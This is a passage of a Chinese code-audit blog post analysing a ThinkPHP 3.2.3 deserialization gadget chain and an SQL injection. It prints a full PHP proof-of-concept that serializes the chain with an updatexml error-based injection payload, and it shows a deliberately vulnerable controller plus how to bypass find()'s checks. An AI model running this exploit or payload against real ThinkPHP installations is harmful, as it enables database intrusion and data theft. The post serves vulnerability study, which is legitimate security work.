class="string">&#x27;dsn&#x27;</span>]  =   <span class="keyword">$this</span>-&gt;parseDsn(<span class="variable">$config</span>);</span><br><span class="line">            &#125;</span><br><span class="line">            <span class="keyword">if</span>(version_compare(PHP_VERSION,<span class="string">&#x27;5.3.6&#x27;</span>,<span class="string">&#x27;&lt;=&#x27;</span>))&#123; </span><br><span class="line">                <span class="comment">// 禁用模拟预处理语句</span></span><br><span class="line">                <span class="keyword">$this</span>-&gt;options[PDO::ATTR_EMULATE_PREPARES]  =   <span class="literal">false</span>;</span><br><span class="line">            &#125;</span><br><span class="line">            <span class="keyword">$this</span>-&gt;linkID[<span class="variable">$linkNum</span>] = <span class="keyword">new</span> PDO( <span class="variable">$config</span>[<span class="string">&#x27;dsn&#x27;</span>], <span class="variable">$config</span>[<span class="string">&#x27;username&#x27;</span>], <span class="variable">$config</span>[<span class="string">&#x27;password&#x27;</span>],<span class="keyword">$this</span>-&gt;options);</span><br><span class="line">        &#125;<span class="keyword">catch</span> (\PDOException <span class="variable">$e</span>) &#123;</span><br><span class="line">            <span class="keyword">if</span>(<span class="variable">$autoConnection</span>)&#123;</span><br><span class="line">                trace(<span class="variable">$e</span>-&gt;getMessage(),<span class="string">&#x27;&#x27;</span>,<span class="string">&#x27;ERR&#x27;</span>);</span><br><span class="line">                <span class="keyword">return</span> <span class="keyword">$this</span>-&gt;connect(<span class="variable">$autoConnection</span>,<span class="variable">$linkNum</span>);</span><br><span class="line">            &#125;<span class="keyword">elseif</span>(<span class="variable">$config</span>[<span class="string">&#x27;debug&#x27;</span>])&#123;</span><br><span class="line">                E(<span class="variable">$e</span>-&gt;getMessage());</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">return</span> <span class="keyword">$this</span>-&gt;linkID[<span class="variable">$linkNum</span>];</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>在第二个if判断，判断$config是否为空，为空则从自身的config从获取，在初始化方法中明显没有参数，所以这里直接从自身的config中获取，所以我们还需要初始化数据库的连接。最后poc如下</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="keyword">namespace</span> <span class="title">Think</span>\<span class="title">Image</span>\<span class="title">Driver</span>&#123;</span><br><span class="line">    <span class="title">use</span> <span class="title">Think</span>\<span class="title">Session</span>\<span class="title">Driver</span>\<span class="title">Memcache</span>;</span><br><span class="line">    <span class="class"><span class="keyword">class</span> <span class="title">Imagick</span></span>&#123;</span><br><span class="line">        <span class="keyword">private</span> <span class="variable">$img</span>;</span><br><span class="line">        <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__construct</span>(<span class="params"></span>)</span>&#123;</span><br><span class="line">            <span class="keyword">$this</span>-&gt;img = <span class="keyword">new</span> Memcache();</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">namespace</span> <span class="title">Think</span>\<span class="title">Session</span>\<span class="title">Driver</span>&#123;</span><br><span class="line">    <span class="title">use</span> <span class="title">Think</span>\<span class="title">Model</span>;</span><br><span class="line"></span><br><span class="line">    <span class="class"><span class="keyword">class</span> <span class="title">Memcache</span> </span>&#123;</span><br><span class="line">        <span class="keyword">protected</span> <span class="variable">$handle</span>;</span><br><span class="line">        <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__construct</span>(<span class="params"></span>)</span>&#123;</span><br><span class="line">            <span class="keyword">$this</span>-&gt;handle = <span class="keyword">new</span> Model();</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">namespace</span> <span class="title">Think</span>&#123;</span><br><span class="line">    <span class="title">use</span> <span class="title">Think</span>\<span class="title">Db</span>\<span class="title">Driver</span>\<span class="title">Mysql</span>;</span><br><span class="line">    <span class="class"><span class="keyword">class</span> <span class="title">Model</span> </span>&#123;</span><br><span class="line">        <span class="keyword">protected</span> <span class="variable">$data</span>=<span class="keyword">array</span>();</span><br><span class="line">        <span class="keyword">protected</span> <span class="variable">$pk</span>;</span><br><span class="line">        <span class="keyword">protected</span> <span class="variable">$options</span>=<span class="keyword">array</span>();</span><br><span class="line">        <span class="keyword">protected</span> <span class="variable">$db</span>=<span class="literal">null</span>;</span><br><span class="line"></span><br><span class="line">        <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__construct</span>(<span class="params"></span>)</span></span><br><span class="line"><span class="function">        </span>&#123;</span><br><span class="line">            <span class="keyword">$this</span>-&gt;db = <span class="keyword">new</span> Mysql();</span><br><span class="line">            <span class="keyword">$this</span>-&gt;options[<span class="string">&#x27;where&#x27;</span>] = <span class="string">&#x27;&#x27;</span>;</span><br><span class="line">            <span class="keyword">$this</span>-&gt;pk = <span class="string">&#x27;id&#x27;</span>;</span><br><span class="line">            <span class="keyword">$this</span>-&gt;data[<span class="keyword">$this</span>-&gt;pk] = <span class="keyword">array</span>(</span><br><span class="line">                <span class="string">&#x27;where&#x27;</span>=&gt;<span class="string">&#x27;1=1&#x27;</span>,</span><br><span class="line">                <span class="string">&#x27;table&#x27;</span>=&gt;<span class="string">&#x27;mysql.user where 1=updatexml(1,concat(0x7e,user(),0x7e),1)#&#x27;</span></span><br><span class="line"></span><br><span class="line">            );</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">namespace</span> <span class="title">Think</span>\<span class="title">Db</span>\<span class="title">Driver</span>&#123;</span><br><span class="line">    <span class="title">use</span> <span class="title">PDO</span>;</span><br><span class="line">    <span class="class"><span class="keyword">class</span> <span class="title">Mysql</span> </span>&#123;</span><br><span class="line">        <span class="keyword">protected</span> <span class="variable">$config</span>     = <span class="keyword">array</span>(</span><br><span class="line">            <span class="string">&#x27;debug&#x27;</span>             =&gt;   <span class="literal">true</span>,</span><br><span class="line">            <span class="string">&quot;charset&quot;</span>           =&gt;  <span class="string">&quot;utf8&quot;</span>,</span><br><span class="line">            <span class="string">&#x27;type&#x27;</span>              =&gt;  <span class="string">&#x27;mysql&#x27;</span>,     <span class="comment">// 数据库类型</span></span><br><span class="line">            <span class="string">&#x27;hostname&#x27;</span>          =&gt;  <span class="string">&#x27;localhost&#x27;</span>, <span class="comment">// 服务器地址</span></span><br><span class="line">            <span class="string">&#x27;database&#x27;</span>          =&gt;  <span class="string">&#x27;thinkphp&#x27;</span>,          <span class="comment">// 数据库名</span></span><br><span class="line">            <span class="string">&#x27;username&#x27;</span>          =&gt;  <span class="string">&#x27;root&#x27;</span>,      <span class="comment">// 用户名</span></span><br><span class="line">            <span class="string">&#x27;password&#x27;</span>          =&gt;  <span class="string">&#x27;root&#x27;</span>,          <span class="comment">// 密码</span></span><br><span class="line">            <span class="string">&#x27;hostport&#x27;</span>          =&gt;  <span class="string">&#x27;3306&#x27;</span>,        <span class="comment">// 端口</span></span><br><span class="line">        );</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">namespace</span> <span class="title">Home</span>\<span class="title">Controller</span>&#123;</span><br><span class="line">    <span class="title">use</span> <span class="title">Think</span>\<span class="title">Controller</span>;</span><br><span class="line">    <span class="class"><span class="keyword">class</span> <span class="title">DemoController</span> <span class="keyword">extends</span> <span class="title">Controller</span> </span>&#123;</span><br><span class="line">        <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">index</span>(<span class="params"></span>)</span>&#123;</span><br><span class="line">            <span class="keyword">echo</span> base64_encode(serialize(<span class="keyword">new</span> \Think\Image\Driver\Imagick() ));</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p><img src="https://ch1e-img.oss-cn-beijing.aliyuncs.com/img/image-20220518001431091.png" alt="image-20220518001431091"></p>
<h1 id="Thinkphp3-2-3-SQL注入"><a href="#Thinkphp3-2-3-SQL注入" class="headerlink" title="Thinkphp3.2.3 SQL注入"></a>Thinkphp3.2.3 SQL注入</h1><p>这里再补一个该版本的SQL注入分析吧，因为感觉如果要重新开一篇比较麻烦，直接就在这继续了。首先我们得制造一个漏洞点</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="keyword">namespace</span> <span class="title">Home</span>\<span class="title">Controller</span>;</span><br><span class="line"><span class="keyword">use</span> <span class="title">Think</span>\<span class="title">Controller</span>;</span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">IndexController</span> <span class="keyword">extends</span> <span class="title">Controller</span> </span>&#123;</span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">index</span>(<span class="params"></span>)</span>&#123;</span><br><span class="line">        <span class="variable">$data</span> = M(<span class="string">&#x27;User&#x27;</span>)-&gt;find(I(<span class="string">&#x27;GET.id&#x27;</span>));</span><br><span class="line">        var_dump(<span class="variable">$data</span>);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>ok，我们传入一个id参数，然后用I方法获取。并且调用了find方法，这里的问题就是出在find方法，来随便看看吧</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span>(is_numeric(<span class="variable">$options</span>) || is_string(<span class="variable">$options</span>)) &#123;</span><br><span class="line">    <span class="variable">$where</span>[<span class="keyword">$this</span>-&gt;getPk()]  =   <span class="variable">$options</span>;</span><br><span class="line">    <span class="variable">$options</span>                =   <span class="keyword">array</span>();</span><br><span class="line">    <span class="variable">$options</span>[<span class="string">&#x27;where&#x27;</span>]       =   <span class="variable">$where</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>这里判断了options是数字或者字符串，如果是的话，直接指定当前查询表的主键为查询字段。同时他也提供了根据复合主键查找记录的功能</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="variable">$pk</span>  =  <span class="keyword">$this</span>-&gt;getPk();</span><br><span class="line"><span class="keyword">if</span> (is_array(<span class="variable">$options</span>) &amp;&amp; (count(<span class="variable">$options</span>) &gt; <span class="number">0</span>) &amp;&amp; is_array(<span class="variable">$pk</span>)) &#123;</span><br><span class="line">    <span class="comment">// 根据复合主键查询</span></span><br><span class="line">    <span class="variable">$count</span> = <span class="number">0</span>;</span><br><span class="line">    <span class="keyword">foreach</span> (array_keys(<span class="variable">$options</span>) <span class="keyword">as</span> <span class="variable">$key</span>) &#123;</span><br><span class="line">        <span class="keyword">if</span> (is_int(<span class="variable">$key</span>)) <span class="variable">$count</span>++; </span><br><span class="line">    &#125; </span><br><span class="line">    <span class="keyword">if</span> (<span class="variable">$count</span> == count(<span class="variable">$pk</span>)) &#123;</span><br><span class="line">        <span class="variable">$i</span> = <span class="number">0</span>;</span><br><span class="line">        <span class="keyword">foreach</span> (<span class="variable">$pk</span> <span class="keyword">as</span> <span class="variable">$field</span>) &#123;</span><br><span class="line">            <span class="variable">$where</span>[<span class="variable">$field</span>] = <span class="variable">$options</span>[<span class="variable">$i</span>];</span><br><span class="line">            <span class="keyword">unset</span>(<span class="variable">$options</span>[<span class="variable">$i</span>++]);</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="variable">$options</span>[<span class="string">&#x27;where&#x27;</span>]  =  <span class="variable">$where</span>;</span><br><span class="line">    &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">        <span class="keyword">return</span> <span class="literal">false</span>;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>他是先判断options是否是一个长度大于0的数组并且pk也是一个数组，满足以上条件才能进入if语句，这里的话有两个if语句，但是我们可以直接绕过这两个if语句直接进入到<code>$options=$this-&gt;_parseOptions($options);</code>部分，不满足第一个if需要options是一个数组，满足第二部分需要options数组长度大于0并且pk需要是一个数组，我们现在只要让pk不是数组即可绕过，后面的话就是正常的构造注入语句了。</p>

  </div>
   
   

  
  <div class="post-copyright">
    <div class="post-copyright-icon"></div>
      <div class="post-copyright-author">
          <span class="post-copyright-meta">文章作者: </span>
            <span class="post-copyright-info">
              <a href="mailto:1444440144@qq.com" >ch1e</a>
            </span>
      </div>
      <div class="post-copyright-type">
          <span class="post-copyright-meta">文章链接: </span>
            <span class="post-copyright-info">
              <a href="https://ch1e.cn/2022/05/17/tp3unser/" >https://ch1e.cn/2022/05/17/tp3unser/</a>
            </span>
      </div><div class="post-copyright-notice">
          <span class="post-copyright-meta">版权声明: </span>
            <span class="post-copyright-info">本博客所有文章除特别声明外，均采用
              <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/ " target="_blank" >
                  CC BY-NC-SA 4.0 </a> 许可协议。转载请注明来自
              <a href="https://ch1e.cn/2022/05/17/tp3unser/" target="_blank" >ch1e</a>
              ！</span>
      </div>
  </div>
  


 

  
    <div class="post-tag">
        <span>
            <i class="fa fa-tag"></i>
             
            <a href="tags/web安全/"><span>web安全</span></a>
                
                    <i class="fas fa-angle-right"></i>
                
             
            <a href="tags/代码审计/"><span>代码审计</span></a>
                
                    <i class="fas fa-angle-right"></i>
                
             
            <a href="tags/反序列化/"><span>反序列化</span></a>
                
            
        </span>
    </div>
  




<div class="pagination-post">
    
    <a href="/2022/05/22/jizhi/">
      <div class="prev-title"><i class="fas fa-chevron-left"></i>极致CMS审计</div>
      <div class="prev-desc">文件架构
个人看了一下，Home是home模块的目录，A是admin模块的目录，cache是缓存目录，conf是一些配置文件，public是公共静态文件。
FrPHP目录结构

common 包...</div>
    </a>
    
    
    <a href="/2022/05/15/tp3/">
      <div class="next-title">从0到1学习ThinkPHP3.2.3<i class="fas fa-chevron-right"></i></div>
      <div class="next-desc">前言摆了好几天，java暂时没有啥方向，感觉比较迷茫，出了两天的CTF题，感觉还是得补补php这块
目录结构初始的ThinkPHP结构如下，Application和Public目录都是空的，Ap...</div>
    </a>
    
</div>

</article>
 


  <div id="toc-wrap">
    <div id="toc">
      <div class="toc-title">
        <div>
          目录
            <span class="num">0%</span>
        </div>
        <progress class="progress" value="0" max="100"></progress>
      </div>
      <div class="toc-list">
         
        <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#%E5%89%8D%E8%A8%80"><span class="toc-text">前言</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E9%93%BE%E5%88%86%E6%9E%90"><span class="toc-text">反序列化链分析</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E9%93%BE%E6%9E%84%E9%80%A0"><span class="toc-text">反序列化链构造</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Thinkphp3-2-3-SQL%E6%B3%A8%E5%85%A5"><span class="toc-text">Thinkphp3.2.3 SQL注入</span></a></li></ol>
      </div>
    </div>
  </div>


        </main>
        <section id="rightside">
    
    <div class="rightside-item">
        
        
         
        
        
            <a id="open-toc" title="目录">
                <i class="fas fa-list-ul"></i>
            </a>
        
         
         
        <a href="javascript:(0)" id="darkmode" title="深色/浅色 ">
            <i class="fas fa-moon"></i>
        </a>
         
        
        <a href="#" title="回到顶部">
            <i class="fas fa-arrow-up"></i>
        </a>
    </div>
</section>
         

<footer class="footer" id="footer">
    <div class="copyright">
      &copy; 2020 - 2022
        <i class="fas fa-fan"></i>
        ch1e
    </div>
    <div class="framework-info">
        <span>框架 </span>
        <a href="https://hexo.io" target="_blank">Hexo</a>
        <span class="footer-separator">|</span>
        <span>主题 </span>
        <a href="https://github.com/lete114/hexo-theme-MengD" target="_blank">MengD.(萌典) </a>
    </div>
    
    <div class="custom-text">我相信我可以，但我一直在路上，所以我有无限的可能！！</div>
</footer>
    </div>
    <div id="mask" onclick="closeAll()"></div>
    
    <div class="script">
        <script src="/js/main.js"></script>
        


<script src="/js/lazyload.js"></script>


    


        
    <script>
        getScript('https://cdn.jsdelivr.net/npm/pjax/pjax.min.js',LoadPjax)
        function LoadPjax() {
            var pjax = new Pjax({
                selectors: [
                    'head title',
                    'head meta[name="keywords"]',
                    'head meta[name="description"]',
                    'main',
                    '#rightside'
                ],
                cache: true,
                cacheBust: false
            });
        }

        // 清除时间
        var timer = null;
        // 执行进度条
        function ProgressStart() {
            // 设置初始进度
            var progress = 10;
            // 创建进度条 及 css样式
            var div = document.createElement('div');
            div.className = 'pjax-progress';
            document.body.prepend(div);
            // 定义随机数最大值最小值
            var max = 10, mini = 3;
            var result = max - mini;
            // 清除
            clearInterval(timer);
            // 0.5秒内累加进度
            timer = setInterval(function () {
                // 随机数
                var num = parseInt(Math.random() * result);
                var randomResult = num + mini;
                // 累加
                progress += randomResult
                document.getElementsByClassName('pjax-progress')[0].style.width = progress + '%';
                // 当进度达到95%时停止
                if (progress > 95) progress = 95
            }, 500)
        }
        // 加载进度条加载完毕
        function ProgressFinish() {
            clearInterval(timer);
            // 页面加载完毕后进度100% 并在0.7秒后删除
            var progress = document.getElementsByClassName('pjax-progress');
            progress[0].style.width = '100%';
            timer = setTimeout(function () {
                progress[0].parentNode.removeChild(progress[0])
            }, 700);
        }

        // 开始 PJAX 执行的函数
        document.addEventListener('pjax:send', function () {
            // 执行进度条
            ProgressStart()
        });
        // PJAX 完成之后执行的函数，可以和上面的重载放在一起
        document.addEventListener('pjax:complete', function () {

            // 加载进度条加载完毕
            ProgressFinish()
            // 执行所有方法
            exeAllFn()

            
                // 图片懒加载
                ImgLazyLoad('body img[data-img]', 'data-img')
            


            document.querySelectorAll('script[data-pjax]').forEach(item => {
                const newScript = document.createElement('script')
                const content = item.text || item.textContent || item.innerHTML || ''
                Array.from(item.attributes).forEach(attr => newScript.setAttribute(attr.name, attr.value))
                newScript.appendChild(document.createTextNode(content))
                item.parentNode.replaceChild(newScript, item)
            })
        });

        // Pjax请求错误时，跳转到404页面
        document.addEventListener('pjax:error', (err) => {
            if (err.request.status === 404) {
                pjax.loadUrl('/404.html')
            }
        })
    </script>

    </div>
</body>

</html>